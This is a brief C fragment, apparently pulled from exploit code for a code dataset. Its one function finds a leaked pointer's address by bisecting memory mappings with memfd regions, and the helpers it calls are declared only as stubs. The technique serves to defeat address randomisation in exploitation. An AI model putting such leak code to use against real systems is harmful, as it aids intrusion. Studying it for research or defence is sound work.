
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 scalar_t__ MEMFD_SIZE ;
 scalar_t__ MMAP_ADDR_END ;
 unsigned long MMAP_ADDR_START ;
 scalar_t__ PAGE_SIZE ;
 unsigned long bisect_via_assign (unsigned long,scalar_t__) ;
 unsigned long bisect_via_memfd (scalar_t__,unsigned long,scalar_t__) ;
 int debug1 (char*,unsigned long,...) ;

__attribute__((used)) static unsigned long bisect_leak_ptr_addr() {
 unsigned long addr = bisect_via_memfd(
   MEMFD_SIZE, MMAP_ADDR_START, MMAP_ADDR_END);
 debug1("%lx %lx\n", addr, addr + MEMFD_SIZE);
 addr = bisect_via_memfd(PAGE_SIZE, addr, addr + MEMFD_SIZE);
 debug1("%lx %lx\n", addr, addr + PAGE_SIZE);
 addr = bisect_via_assign(addr, addr + PAGE_SIZE);
 debug1("%lx\n", addr);
 return addr;
}
